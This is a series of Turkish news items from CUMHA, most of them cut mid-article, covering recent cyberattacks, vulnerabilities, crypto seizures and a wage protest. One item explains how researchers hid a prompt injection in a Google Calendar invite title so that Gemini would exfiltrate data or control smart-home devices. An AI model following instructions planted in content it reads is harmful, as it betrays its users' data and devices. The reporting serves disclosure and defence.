Şirketin açıklamasına göre bu kurallar, anormal kullanıcı davranışlarını, potansiyel hesap ele geçirmelerini, hatalı yapılandırmaları ve sahte yönetici hesaplarının oluşturulmasını ortaya çıkarabiliyor. Ayrıca SMS bombardımanı ve token hırsızlığı gibi saldırı yöntemlerinin log kayıtları üzerinden izlenmesine de imkan tanıyor.

Kullanım süreci
Kullanıcılar, kurallara GitHub üzerinden erişebiliyor. Sigma uyumlu sorgular, sigma-cli gibi dönüştürücüler aracılığıyla farklı SIEM veya log analiz sistemlerine uyarlanabiliyor. Kurallar önce geçmiş loglar üzerinde test edilerek yanlış pozitif sonuçlar ayıklanabiliyor, ardından canlı ortama aktarılabiliyor.

Okta, kullanıcıların kendi geliştirdikleri kuralları da GitHub deposuna “pull request” yoluyla ekleyebileceğini, böylece topluluk temelli bir güvenlik katmanı oluşturulacağını belirtiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Saldırı yöntemi nasıl işliyor
PyPI üzerindeki proje geliştiricilerinin hesapları, e-posta adresleriyle bağlantılı olarak çalışıyor. Bazı adresler özel alan adlarına bağlı olduğunda, bu alan adı süresi dolduğunda saldırganlar aynı alan adını yeniden kaydedebiliyor. Sonrasında bir e-posta sunucusu kurarak parola sıfırlama talebinde bulunabiliyor ve ilgili PyPI hesabının kontrolünü ele geçirebiliyor.

Bu tür saldırılar tedarik zinciri riski yaratıyor. Ele geçirilen hesaplarla popüler Python paketlerinin kötü amaçlı sürümleri yayımlanabiliyor ve bu paketler pip üzerinden otomatik yüklenebiliyor. Daha önce Mayıs 2022’de “ctx” paketine yapılan saldırıda saldırganlar Amazon AWS anahtarlarını hedef alan kötü amaçlı kod eklemişti.

Yeni koruma sistemi
PyPI, alan adlarının yaşam döngüsünü (aktif, ek süre, kurtarma süresi, silinme beklemede) Domainr’ın Status API servisini kullanarak kontrol ediyor. Alan adı süresi dolmuş veya sona erme aşamasına girmişse, bu e-posta adresleri doğrulamasını kaybediyor ve parola sıfırlama ya da hesap kurtarma işlemlerinde kullanılamıyor.

Yeni sistemin geliştirilmesi Nisan 2025’te başladı ve Haziran 2025’te günlük taramalarla devreye alındı. O tarihten bu yana 1.800’den fazla e-posta adresi bu kapsamda geçersiz sayıldı.

Kullanıcılara öneriler
PyPI, kullanıcıların hesaplarına özel alan adı yerine genel e-posta servislerinden yedek bir adres eklemelerini ve hesap güvenliği için iki faktörlü kimlik doğrulama kullanmalarını öneriyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Siber suçlarla bağlantılı kripto paraların izlenmesi ve engellenmesine yönelik iki farklı girişim kapsamında, 300 milyon dolardan fazla değerde dijital varlık donduruldu. Çalışmalar, uluslararası kolluk kuvvetleri ile özel sektör iş birliğinde yürütüldü.

T3 FCU girişimi
TRM Labs, TRON ve Tether tarafından 2024 yılında başlatılan T3 Finansal Suç Birimi (T3 FCU), bugüne kadar 250 milyon doların üzerinde suç gelirini dondurdu. Binance’in ilk resmi üye olarak katıldığı girişimde, milyonlarca işlem analiz edilerek kara para aklama, yatırım dolandırıcılığı, terör finansmanı ve fidye yazılımları gibi vakalarla ilgili soruşturmalara destek sağlandı.

TRM Labs tarafından yapılan açıklamada, Eylül 2024’ten bu yana beş kıtada 3 milyar doların üzerinde işlem hacminin izlendiği, bu kapsamda özellikle “romantik tuzak” adı verilen dolandırıcılık yöntemlerine yönelik 6 milyon doların dondurulduğu belirtildi.

Kanada ve ABD merkezli operasyonlar
Diğer girişim ise ABD ve Kanada’nın yürüttüğü, Chainalysis uzmanlarının destek verdiği operasyonlarla gerçekleşti. Ontario Eyalet Polisi tarafından yürütülen “Project Atlas” ve Britanya Kolumbiyası Menkul Kıymetler Komisyonu tarafından yönetilen “Operation Avalanche” kapsamında, son altı ayda 74,3 milyon dolarlık kayıp tespit edildi.

Chainalysis verilerine göre, bu operasyonlar kapsamında 14 farklı ülkede 2.000’den fazla kripto cüzdan adresi belirlendi. Tether ile yapılan iş birliği sayesinde 50 milyon dolardan fazla USDT kara listeye alındı ve suçluların bu varlıkları nakde çevirmesi engellendi.

Uzmanlara göre, bu tür küresel iş birlikleri, siber suçların finansman kaynaklarını kurutma ve suç gelirlerinin dolaşımını blockchain üzerinde doğrudan engelleme açısından kritik önem taşıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Ankara’da toplu sözleşme mitingi
8. Toplu Sözleşme süreci kapsamında Ankara Anadolu Meydanı’nda Memur-Sen öncülüğünde geniş katılımlı bir miting gerçekleştirildi. Türkiye’nin farklı illerinden gelen kamu çalışanları, emekliler, kadın, genç ve engelli komisyonları ile çok sayıda sendika temsilcisi “Hak, Emek, Adalet” sloganlarıyla alanı doldurdu.

İş bırakma eylemi yapıldı
Memur-Sen, görüşmelerde kamu işvereninin sunduğu teklifleri yetersiz bulduklarını belirterek iş bırakma eylemi gerçekleştirdi. Yüzbinlerce kişinin katıldığı mitingde konuşan sendika temsilcileri, “Bugün emeği savunma günüdür, bugün hayatı durdurma günüdür.” ifadeleriyle tepkilerini dile getirdi.

Zam teklifine tepki
Sendika yetkilileri, kamu işvereninin 2026 için yüzde 10+6, 2027 için yüzde 4+4 zam teklifini reddettiklerini açıkladı. Ayrıca taban aylığa önerilen 1000 TL artışı da yetersiz bulan sendika temsilcileri, “Bu paraya market filesinin yarısı bile dolmaz. Biz sadaka değil, insanca yaşayacak ücret istiyoruz.” dedi.

Adalet ve gelir dağılımı vurgusu
Mitingde yapılan konuşmalarda refah payı, oransal zam ve gelir vergisinin yüzde 15’e sabitlenmesi talepleri dile getirildi. Kamu işvereninin tekliflerinin gerçek enflasyonla bağdaşmadığı, memur ve emeklinin alım gücünü yükseltmediği ifade edildi. “Enflasyon kadar zam, zam değildir” ifadeleriyle mevcut tekliflerin kabul edilmeyeceği vurgulandı.

Son gün uyarısı
Toplu sözleşme görüşmelerinde imza için son bir gün kaldığını hatırlatan sendika temsilcileri, Maliye ve Çalışma Bakanlıklarına çağrı yaparak, “Ücrette dengeyi, gelirde adaleti sağlayacak gerçekçi bir teklif bekliyoruz. Masada uzlaşı sağlanmazsa sahada mücadele sürecek.” açıklamasında bulundu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kuruoğlu, hükümetin 6,5 milyon memur ve emekliyi yok saydığını belirterek, Toplu Sözleşme masasına getirilen teklifin kabul edilemez olduğunu ifade etti. Kuruoğlu, "Yoksulluk sınırının 89 bin TL, açlık sınırının 26 bin TL'ye ulaştığı bir ülkede, memur ve emekliye 2 yıl için toplamda yüzde 24 zam teklif edilmesi akıl dışıdır." dedi.

"Memur ve emekli açlık sınırının altında yaşamaya zorlanıyor"
Hükümetin ikinci zam teklifinde taban aylığa sadece 1000 TL artış öngördüğünü belirten Kuruoğlu, bunun günlük 33 TL’ye denk geldiğini söyledi. Kuruoğlu, "Bu durum memuru yoksulluk sınırı, emekliyi açlık sınırı altında yaşamaya mahkûm etmektir." ifadelerini kullandı.

"Sözler tutulmadı"
Kuruoğlu, Cumhurbaşkanı tarafından verilen seyyanen zam sözünün yerine getirilmediğini hatırlatarak, bu zammın emeklilere de yansıtılması gerektiğini vurguladı. Ayrıca, memur maaşlarındaki iyileştirmelerin emekli aylıklarına da yansıtılması gerektiğini belirtti.

"Mücadelemiz devam edecek"
Yapılan eylemin ilk adım olduğunu söyleyen Kuruoğlu, talepler karşılanana kadar mücadele edeceklerini açıkladı. Kuruoğlu, "Demokratik haklarımızı çekinmeden kullanacağız. Ya zam teklifinizi revize edin ya da ‘Hükümet zammını al başına çal’ diyoruz." sözleriyle konuşmasını tamamladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Hangi sürümler etkileniyor
Cisco’ya göre açık, FMC yazılımının 7.0.7 ve 7.7.0 sürümlerinde, RADIUS kimlik doğrulaması aktifken ortaya çıkıyor. Bu, özellikle kurumsal ve devlet ağlarında merkezi kimlik doğrulama için sık kullanılan bir konfigürasyon.

Güncellemeler yayımlandı
Cisco, güvenlik açığını gidermek için ücretsiz yazılım güncellemelerini yayımladı. Yama, geçerli hizmet sözleşmesine sahip müşteriler için standart kanallar üzerinden erişilebilir durumda.

Geçici çözüm seçeneği
Yama yüklenemeyen ortamlarda önerilen tek geçici çözüm, RADIUS kimlik doğrulamasını devre dışı bırakarak yerine yerel kullanıcı hesapları, LDAP ya da SAML tabanlı kimlik doğrulama yöntemlerinin kullanılması.

Henüz istismar edilmedi
Açık, Cisco güvenlik araştırmacısı Brandon Sakai tarafından dahili testlerde keşfedildi. Şirket, açığın sahada istismar edildiğine dair herhangi bir bulguya sahip olmadığını açıkladı.

Ek güvenlik yamaları
Cisco ayrıca Snort 3, ASA, FTD, IOS ve IOS XE gibi ürünlerde hizmet reddi (DoS) ve HTML enjeksiyonu gibi 13 yüksek önem dereceli güvenlik açığını da kapattı. Bu açıkların hiçbirinin aktif olarak istismar edildiği raporlanmadı.

beykoz haber

Kaynak: CUMHA - CUMHUR HABER AJANSI

145 bin kişi bilgilendirildi
Maine Başsavcılığı’na yapılan bildirimde, 144.189 kişinin verilerinin saldırıdan etkilendiği belirtildi. Çalınan veriler arasında kimlik bilgileri, pasaport taramaları, sosyal güvenlik numaraları, adresler, iletişim bilgileri ve test sonuçları yer alabileceği aktarıldı.

RansomHub saldırıyı üstlendi
RansomHub fidye yazılımı grubu, Ocak 2025’te saldırıyı üstlendiğini açıkladı. Grup, Manpower’ın sistemlerinden yaklaşık 500 GB veri çaldığını ve bunun içinde yıllara ait yazışmalar, mali tablolar, insan kaynakları verileri, gizli sözleşmeler ve NDA’ların bulunduğunu iddia etti. Daha sonra verilerin sızdırılacağına dair paylaşımlar grubun sızdırma sitesinden kaldırıldı, bu da fidyenin ödenmiş olabileceği ihtimalini gündeme getirdi.

Şirketten açıklama
ManpowerGroup sözcüsü, olayın yalnızca bağımsız bir franchise şubesini etkilediğini, şirketin kurumsal ağının saldırıdan etkilenmediğini vurguladı. Şirket, FBI ile iş birliği yaptığını ve etkilenen kişilere Equifax üzerinden ücretsiz kredi izleme ve kimlik hırsızlığına karşı koruma hizmeti sunduğunu açıkladı.

RansomHub’ın geçmişi
RansomHub, daha önce Halliburton, Rite Aid, Kawasaki, Christie's, Frontier Communications ve Planned Parenthood gibi kurumları da hedef aldı. Grup ayrıca Change Healthcare saldırısında 190 milyondan fazla kişinin etkilendiği verileri sızdırmıştı. FBI, Ağustos 2024 itibarıyla grubun 200’den fazla kritik altyapı kuruluşunu hedef aldığını bildirmişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

3,3 milyon dolarlık zarar
Sanığın, 8,4 milyon dolarlık sahte vergi iadesi başvurusu yaparak yaklaşık 2,5 milyon dolar elde ettiği, ayrıca sahte SBA kredi başvurularıyla 819 bin dolar çaldığı belirtildi. Toplam zarar 3,3 milyon doları aştı.

Sahte yatırım planı da yürüttü
Savcılığa göre Amachukwu, aynı dönemde sahte yatırım teklifleriyle de mağdurları kandırdı. “Standby letter of credit” gibi gerçekte var olmayan finansal araçları satarak milyonlarca doları kendi hesabına aktardı.

Fransa’dan iade edildi
Amachukwu, 4 Ağustos 2025’te Fransa’dan ABD’ye iade edildi ve ertesi gün New York Güney Bölgesi’nde hâkim karşısına çıkarıldı. Henüz duruşma tarihi belirlenmedi.

Ciddi cezalarla karşı karşıya
Sanık hakkında bilgisayar korsanlığına teşebbüs (5 yıl), iki kez kablolu dolandırıcılık (her biri 20 yıl), iki kez kablolu dolandırıcılığa teşebbüs (her biri 20 yıl) ve ağırlaştırılmış kimlik hırsızlığı (zorunlu 2 yıl ek ceza) suçlamaları bulunuyor. Ayrıca elde ettiği tüm malvarlıklarına el konulması talep ediliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

T3+ programı ile 250 milyon dolar donduruldu
Eylül 2024’te kurulan T3 Financial Crime Unit, bugüne kadar dünya genelinde 250 milyon dolarlık suç gelirini dondurdu. Bu girişim, TRM Labs, Tether ve TRON tarafından başlatıldı, Binance ise resmi katılımcı oldu. Çalışmalar kapsamında kara para aklama, yatırım dolandırıcılığı, şantaj ve terör finansmanı gibi suçlara yönelik binlerce işlem incelendi.

Öne çıkan vakalardan birinde, Binance iş birliğiyle “romance scam” saldırılarında elde edilen 6 milyon dolarlık kripto varlık donduruldu.

Kanada-ABD iş birliğiyle 74 milyon dolar engellendi
Kanada Ontario Eyalet Polisi’nin yönettiği “Project Atlas” ve Britanya Kolumbiyası Menkul Kıymetler Komisyonu’nun yürüttüğü “Operation Avalanche”, Chainalysis analitiğiyle desteklendi.

Son altı ayda 74,3 milyon dolarlık dolandırıcılık gelirine ulaşıldı ve büyük kısmı donduruldu. Tether iş birliğiyle 50 milyon dolarlık USDT kara listeye alındı.

Küresel etki
Project Atlas, 14 ülkede 2.000’den fazla kripto cüzdan adresini mağdurlarla ilişkilendirdi. Kanada, ABD, Almanya, Avustralya ve Birleşik Krallık mağdurlar arasında yer aldı.

Yöntem: blockchain seviyesinde müdahale
Her iki girişimde de koordineli operasyonlar ve blockchain düzeyinde doğrudan müdahalelerle suç gelirlerinin transfer edilmesi veya nakde çevrilmesi engellendi. Uzmanlar, bu modelin siber suçluların hareket alanını daraltmada kritik bir adım olduğunu belirtiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Garantex’in kapatılmasının ardından Grinex devreye alındı
ABD Gizli Servisi’nin Mart 2025’te Garantex’in alan adlarına el koymasının ardından şirket yöneticilerinin müşteri varlıklarını Grinex’e aktardığı tespit edildi. ABD Hazine Bakanlığı Yabancı Varlıklar Kontrol Ofisi (OFAC), dün itibarıyla Grinex’i yaptırım listesine ekledi.

Yaptırımları aşmak için kuruldu
OFAC açıklamasında, Grinex’in tanıtım materyallerinde borsanın, Garantex’e yönelik yaptırımlar ve varlık dondurmaları sonrası kurulduğunun açıkça ifade edildiği vurgulandı. Grinex’in kuruluşundan bu yana milyarlarca dolarlık kripto para transferine aracılık ettiği belirtildi.

Garantex ve ortaklarına yeni yaptırımlar
OFAC ayrıca Garantex, üç kurucusu (Sergey Mendeleev, Aleksandr Mira Serda, Pavel Karavatsky) ve Rusya ile Kırgızistan’daki altı iş ortağı şirkete (InDeFi Bank, Exved, Old Vector, A7, A71, A7 Agent) yönelik yaptırımları da yeniledi.

Ödül çağrısı
ABD Dışişleri Bakanlığı, Garantex yöneticilerinin yakalanması veya mahkumiyetine yol açacak bilgiler için 6 milyon dolara kadar ödül teklif etti.

Geçmiş bağlantılar
Garantex, Hydra dark web pazarı ve Conti, Black Basta, LockBit, NetWalker, Ryuk, Phoenix Cryptolocker gibi fidye yazılımı gruplarıyla bağlantıları nedeniyle Nisan 2022’de yaptırım listesine alınmıştı. Bakanlığa göre Garantex, Nisan 2019–Mart 2025 arasında 96 milyar dolardan fazla kripto işlemine aracılık etti.

ABD’den mesaj
Hazine Bakanlığı Terörizm ve Mali İstihbarat Müsteşarı John K. Hurley, “Kripto borsalarını kara para aklama ve fidye yazılımlarına destek için kullanmak ulusal güvenliğimizi tehdit ediyor. Bu aktörleri ortaya çıkararak dijital varlık sektörünün bütünlüğünü korumaya kararlıyız” dedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Açık bug bounty ile bildirildi
Plex, hatayı hata ödül programı aracılığıyla öğrendiğini ve hızlıca gidererek yeni sürümü yayımladığını açıkladı. Güvenlik açığına ilişkin CVE kimliği henüz atanmamış olsa da, şirket 1.41.7.x–1.42.0.x sürümlerini çalıştıran tüm sunucuların risk altında olduğunu belirtti.

Yamalanan sürüm
Güvenlik açığını kapatan sürüm Plex Media Server 1.42.1.10060 olarak yayımlandı. Kullanıcılar, sunucu yönetim paneli veya resmi indirme sayfası üzerinden bu sürüme geçiş yapabiliyor.

Acil güncelleme çağrısı
Plex, etkilenen kullanıcılara gönderdiği e-postalarda, sistemlerinin eski sürüm çalıştırdığını belirterek “en kısa sürede güncelleme yapın” uyarısında bulundu. Şirket, saldırganların yamaları analiz ederek istismar geliştirmesinden önce önlem alınması gerektiğini vurguladı.

Plex geçmişte de hedef olmuştu
Mart 2023’te CISA, Plex Media Server’daki üç yıllık bir RCE açığını (CVE-2020-5741) “aktif istismar edilen” açıklar listesine almıştı. Bu zafiyetin, LastPass’in 2022’de yaşadığı büyük veri sızıntısıyla bağlantılı olabileceği düşünülüyor. Aynı yıl Plex de kullanıcı veritabanına sızıldığını ve şifrelerin sıfırlanması gerektiğini duyurmuştu.

Kullanıcılar için öneriler

• Plex Media Server’ınızı 1.42.1.10060 sürümüne güncelleyin.

• Güncellemeleri düzenli takip edin.

• Sunucunuzu internet üzerinden erişime açık bırakmamaya özen gösterin.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kesinti dördüncü gününde sürüyor
Colt Telecom, 12 Ağustos’ta başlayan saldırının ardından destek hizmetlerine ait bazı sistemleri koruma amaçlı çevrim dışı bıraktı. Bu durum, müşteri iletişim platformlarını etkilerken yanıt sürelerinde gecikmelere yol açtı. Şirket, ana ağ altyapısının saldırıdan etkilenmediğini vurguladı.

WarLock grubu verileri satışa çıkardı
‘cnkjasdfgd’ takma adlı bir tehdit aktörü, kendisini WarLock fidye yazılımı grubunun üyesi olarak tanıtarak saldırıyı üstlendi. Hacker, şirketten çaldığı bir milyon belgeyi 200 bin dolar karşılığında satışa çıkardı ve içeriğin doğruluğunu göstermek için örnekler paylaştı. Belgeler arasında mali veriler, müşteri ve çalışan kayıtları, iç yazışmalar ve yazılım geliştirme dokümanları olduğu öne sürüldü.

Microsoft SharePoint açığına işaret ediliyor
Siber güvenlik uzmanı Kevin Beaumont, saldırının Microsoft SharePoint’teki CVE-2025-53770 açığı üzerinden gerçekleştirilmiş olabileceğini belirtti. Bu sıfır gün açığı 18 Temmuz’dan itibaren istismar edilmiş, Microsoft ise 21 Temmuz’da güvenlik güncellemesi yayımlamıştı.

Şirketten açıklama
Colt, saldırıyı doğrularken çalındığı iddia edilen veriler hakkında yorum yapmadı. Şirket sözcüsü, “Siber olaya ilişkin iddiaların farkındayız. İç sistemlerimizi yeniden çalışır hale getirmek için üçüncü taraf uzmanlarla birlikte çalışıyoruz” dedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yeni güvenlik katmanları geliyor
Microsoft 365 yol haritasında yer alan güncellemeye göre Teams, sohbet ve kanallarda çalıştırılabilir dosya türlerini (örn. .exe) engelleyerek dosya tabanlı saldırılara karşı koruma sağlayacak. Ayrıca gönderilen kötü amaçlı bağlantılar otomatik olarak tespit edilip kullanıcıya uyarı verilecek.

Defender entegrasyonu
Microsoft, Teams’in artık Defender for Office 365 Tenant Allow/Block List ile entegre olduğunu duyurdu. Bu sayede güvenlik yöneticileri engellenmiş alan adlarından gelen sohbet, kanal, toplantı ve çağrıları bloke edebilecek. Hatta bu alan adlarından gelen geçmiş iletişimler de otomatik olarak silinebilecek. Özellik Eylül 2025 sonunda genel kullanıma açılacak.

Daha önce gelen güvenlik adımları

• Temmuz 2025: Ekran görüntüsü engelleme özelliği devreye alındı. Toplantılarda kullanıcı ekran görüntüsü almaya çalıştığında pencere siyaha düşerek bilgi sızıntısı önleniyor.

• Şubat 2025: Sohbetlerde marka taklitlerine karşı kimlik avı koruması tüm müşterilere sunuldu.

• Enterprise Connect 2024: Microsoft, Teams’in 320 milyon aylık aktif kullanıcıya ulaştığını açıkladı.

Kullanıma sunulma takvimi
Yeni URL ve dosya engelleme özelliklerinin Eylül 2025’ten itibaren dünya çapında kademeli olarak devreye alınması planlanıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Açığın teknik detayları
Araştırmacı Aviv Y’nin “FortMajeure” adını verdiği açık, FortiWeb’in çerez ayrıştırma sürecindeki “Era” parametresinden kaynaklanıyor. Bu parametre beklenmedik bir değer aldığında, sunucu tüm sıfırlardan oluşan gizli anahtar kullanıyor. Sonuç olarak, sahte çerezler kolayca oluşturulabiliyor ve kimlik doğrulama tamamen atlatılabiliyor.

Nasıl istismar ediliyor
CVE-2025-52970’nin sömürülmesi için hedef kullanıcının aktif oturumunun bulunması gerekiyor. Saldırgan, çerezdeki küçük bir sayısal alanı tahmin etmek zorunda, ancak bu değer genellikle 30’un altında olduğundan brute force işlemi yalnızca birkaç denemeyle tamamlanabiliyor.

Etkilenen sürümler ve yamalar
Zafiyet FortiWeb 7.0–7.6 arasındaki sürümleri etkiliyor. Fortinet, aşağıdaki sürümlerde açığı kapattığını duyurdu:

• 7.6.4 ve sonrası

• 7.4.8 ve sonrası

• 7.2.11 ve sonrası

• 7.0.11 ve sonrası

FortiWeb 8.0 sürümlerinin etkilenmediği açıklandı.

Araştırmacının yaklaşımı
Aviv Y, REST uç noktası üzerinden admin taklidi gösteren bir PoC çıktısı paylaştı, ancak CLI’ye bağlanmayı da içeren tam istismar kodunu daha sonra yayımlayacağını belirtti. Amaç, saldırganlardan önce savunuculara sistemlerini yamalama süresi tanımak.

Yama dışında çözüm yok
Fortinet’in güvenlik bülteninde herhangi bir geçici çözüm sunulmadı. Bu nedenle güvenli sürümlere güncelleme yapmak tek etkili adım olarak gösteriliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Ransomware gelirleri takip edildi
Antropenko’nun, Zeppelin fidye yazılımı saldırılarıyla elde ettiği fidye ödemelerini aklamak için ChipMixer gibi kripto para karıştırma hizmetlerini, nakit dönüşüm işlemlerini ve parçalara bölünmüş banka yatırımlarını kullandığı tespit edildi. ChipMixer, Mart 2023’te yetkililer tarafından kapatılmıştı.

Zeppelin’in geçmişi
2019 sonunda VegaLocker/Buran fidye yazılımının bir türevi olarak ortaya çıkan Zeppelin, özellikle sağlık ve bilişim firmalarını hedef aldı. 2021’de güncellenmiş sürümlerle yeniden ortaya çıksa da kullanılan şifreleme yöntemlerinin zayıflığı dikkat çekmişti.

Kasım 2022’de operasyon büyük ölçüde sona erdi. Daha sonra güvenlik araştırmacılarının 2020’den bu yana ücretsiz dosya kurtarma anahtarına sahip olduğu ortaya çıktı. Ocak 2024’te ise Zeppelin kaynak kodunun bir hacker forumunda yalnızca 500 dolara satıldığı bildirildi.

Fidye ödemelerine el konuldu
Ele geçirilen 2,8 milyon doların fidye gelirlerinden kaynaklandığı belirtiliyor. ABD yetkilileri geçtiğimiz haftalarda da BlackSuit grubundan 1 milyon dolar, Chaos grubundan ise 2,4 milyon dolar değerinde Bitcoin’e el koymuştu.

Uzmanlara göre kritik adım
Yetkililer, bu tür el koyma operasyonlarının, siber suçluların yakalanamadığı durumlarda bile fidye gelirlerini kullanarak yeniden yapılanmalarını veya yeni üyeler kazanmalarını engellemede kritik rol oynadığını vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sahte otomasyon araçlarıyla yayılım
Ruby programlama dilinin resmi paket yöneticisi RubyGems.org üzerinde, farklı takma adlar kullanan saldırganlar tarafından yayımlanan zararlı kütüphaneler, özellikle Güney Koreli kullanıcıları hedef aldı. Paketler, WordPress, Telegram, Naver Café, SEO araçları ve blog platformlarına yönelik otomasyon yazılımları gibi tanıtıldı.

Gerçekte kimlik avı aracı
Kütüphaneler kurulduğunda meşru görünümlü bir arayüz sunuyor, ancak kullanıcı giriş bilgilerini doğrudan saldırganların kontrolündeki alan adlarına (programzon[.]com, appspace[.]kr, marketingduo[.]co[.]kr) iletiyordu. Çalınan veriler arasında kullanıcı adı, şifre (düz metin), cihaz MAC adresi ve paket adı bulunuyor.

Karanlık ağda satışa çıktı
Araştırmacılar, elde edilen bilgilerin Rusça konuşulan dark web pazarlarında satışa çıkarıldığını tespit etti. Kimlik bilgisi günlüklerinin saldırganların kontrol ettiği marketingduo[.]co[.]kr ile bağlantılı olduğu belirlendi.

16 paket hâlâ yayında
Socket, tüm zararlı paketleri RubyGems ekibine bildirdiğini, ancak en az 16’sının hâlâ indirilebilir olduğunu açıkladı. Bu durum, açık kaynak yazılım depolarına yönelik tedarik zinciri saldırılarının süregelen bir tehdit olduğunu gösteriyor.

Geliştiricilere uyarı
Uzmanlar, kütüphaneleri indirirken yayıncının geçmişini ve paketlerin şüpheli kod içerip içermediğini kontrol etmeyi, bağımlılıkları güvenli sürümlere kilitlemeyi ve obfuscation (gizlenmiş) kod parçaları içeren paketlere karşı dikkatli olunması gerektiğini vurguluyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İhlal potansiyel müşterileri etkiledi
Google’ın yaptığı bildirimde, Salesforce üzerinden potansiyel Ads müşterileriyle iletişimde kullanılan verilerin yetkisiz kişilerce erişildiği belirtildi. Etkilenen veriler arasında şirket adları, telefon numaraları ve satış temsilcilerinin notları yer aldı. Ads hesapları, Merchant Center, Analytics ve diğer ürünlerdeki müşteri verilerinin etkilenmediği vurgulandı.

ShinyHunters saldırının arkasında
Saldırının, son aylarda Salesforce müşterilerini hedef alan ShinyHunters grubuyla bağlantılı olduğu doğrulandı. Grup, ele geçirilen verilerin yaklaşık 2,55 milyon kayıttan oluştuğunu iddia etti. Kayıtların arasında mükerrer girişler olabileceği belirtildi.

Scattered Spider ile iş birliği
ShinyHunters, saldırılarda ilk erişimi sağlayan Scattered Spider ile ortak hareket ettiklerini ve birlikte “Sp1d3rHunters” adı altında çalıştıklarını açıkladı. Grup, çalışanlara yönelik sosyal mühendislik saldırılarıyla kimlik bilgisi elde edip, Salesforce ortamlarına kötü amaçlı OAuth uygulamaları bağlatarak tüm veritabanlarını indirdiklerini bildirdi.

Fidye talebi ve yeni araçlar
ShinyHunters, Google’dan 20 Bitcoin (yaklaşık 2,3 milyon dolar) talep ettiklerini, ancak bu talebi “ciddi olmayan” bir hamle olarak nitelendirdiklerini söyledi. Grup ayrıca, artık Salesforce Data Loader yerine kendi geliştirdikleri Python tabanlı araçları kullandıklarını açıkladı.

Google’dan açıklama
Google, Haziran 2025’te bu saldırı yöntemlerine dikkat çekmişti. Şirket, saldırıyı doğrularken kullanıcıların Ads hesaplarının güvende olduğunu yineledi. Ayrıca, yeni araçlarla yapılan saldırıları gözlemlediklerini belirtti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kritik açık Calendar üzerinden tetiklendi
Gemini, Gmail, Calendar ve Google Home gibi hizmetlere entegre çalışıyor. Açık, saldırganın Google Calendar davetinde etkinlik başlığına zararlı bir “prompt injection” gizlemesiyle tetikleniyordu. Kullanıcı Gemini’ye “Bugün takvimimde ne var” gibi rutin bir soru yönelttiğinde, asistan ilgili başlıkları okuyor ve zararlı komutu da kendi bağlamında yürütüyordu.

Olası saldırı senaryoları
Bu yöntemle saldırganlar:

• Kullanıcının e-posta ve takvim verilerini dışarı aktarabiliyor,

• Akıllı ev cihazlarını uzaktan kontrol edebiliyor,

• Uygulama açabiliyor veya Zoom görüşmesi başlatabiliyor,

• Kullanıcının IP adresini öğrenmek için URL açtırabiliyordu.

Altı davetlik sinsi yöntem
Araştırmacılar, Calendar’da yalnızca son beş etkinliğin doğrudan görüntülendiğini belirledi. Bu nedenle saldırganların görünürlükten kaçınmak için altı davet göndermesi, zararlı prompt’u sonuncuya gizlemesi gerekiyordu. Kullanıcılar bu daveti yalnızca “Daha fazla göster” seçeneğine tıklarsa fark edebiliyordu.

Google açığı kapattı
Google, SafeBreach araştırmacıları Ben Nassi ve ekibinin sorumlu bildirim süreci sayesinde açığın istismar edilmeden kapatıldığını açıkladı. Google Workspace güvenlik ürün yönetimi direktörü Andy Wen, araştırmanın savunma mekanizmalarının geliştirilmesini hızlandırdığını vurguladı.

Daha önce de uyarılar yapılmıştı
Geçen ay Mozilla araştırmacısı Marco Figueroa, Gemini’nin başka bir “prompt injection” tekniğine karşı savunmasız olduğunu ve bunun kimlik avı saldırılarına kapı aralayabileceğini açıklamıştı. Google, yeni koruma önlemlerinin devreye alınmakta olduğunu belirtti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

172 bin kişi etkilendi
27 Temmuz’da tamamlanan incelemede, toplam 172 bin üyenin verilerinin risk altında olduğu tespit edildi. Çalınan bilgiler arasında isimler, hesap numaraları, banka kartı verileri, Sosyal Güvenlik numaraları ve devlet kimlikleri bulunuyor. Şirket, üyelerin hesap bakiyelerine erişildiğine dair bir bulgu olmadığını bildirdi.

Dolandırıcılık riski arttı
Connex, resmi internet sitesine koyduğu uyarıyla üyeleri devam eden oltalama saldırılarına karşı bilgilendirdi. Açıklamada, “Connex hiçbir zaman sizden PIN, şifre veya hesap numarası istemez. Şüpheli bir arama veya mesaj alırsanız telefonu kapatıp doğrudan bizi arayın” denildi.

Geniş çaplı saldırı dalgasının parçası
İhlalin, Salesforce platformlarını hedef alan ShinyHunters grubuyla ilişkilendirilen saldırı dalgasının ardından gelmesi dikkat çekti. Son aylarda Allianz Life, Adidas, Qantas, Louis Vuitton, Dior, Tiffany & Co., Chanel ve Google gibi markalar da benzer saldırılardan etkilenmişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

29 binden fazla sunucu yamalanmamış
Shadowserver’ın 10 Ağustos tarihli taramalarına göre dünya genelinde 29.098 sunucu halen yamalanmamış durumda. Bunların 7.200’den fazlası ABD’de, 6.700’den fazlası Almanya’da, 2.500’den fazlası ise Rusya’da bulunuyor.

Microsoft ve CISA’dan uyarılar
Microsoft, açığı Nisan 2025’te yayımladığı bir güvenlik danışmanlığı ve hotfix ile duyurdu. Şirket, “kötüye kullanılma ihtimali yüksek” olarak işaretlediği açık için tüm hibrit yapıların yeni mimariye geçirilmesini tavsiye etti.

ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), 25-02 numaralı acil direktifle federal kurumlara 9 Ağustos Pazartesi sabahına kadar yama yapma zorunluluğu getirdi. CISA ayrıca, federal olmayan kurumların da aynı adımları uygulaması gerektiğini vurguladı.

Alınması gereken önlemler

• Microsoft Health Checker script ile ortam taraması,

• EOL sürümlerin internetten ayrılması,

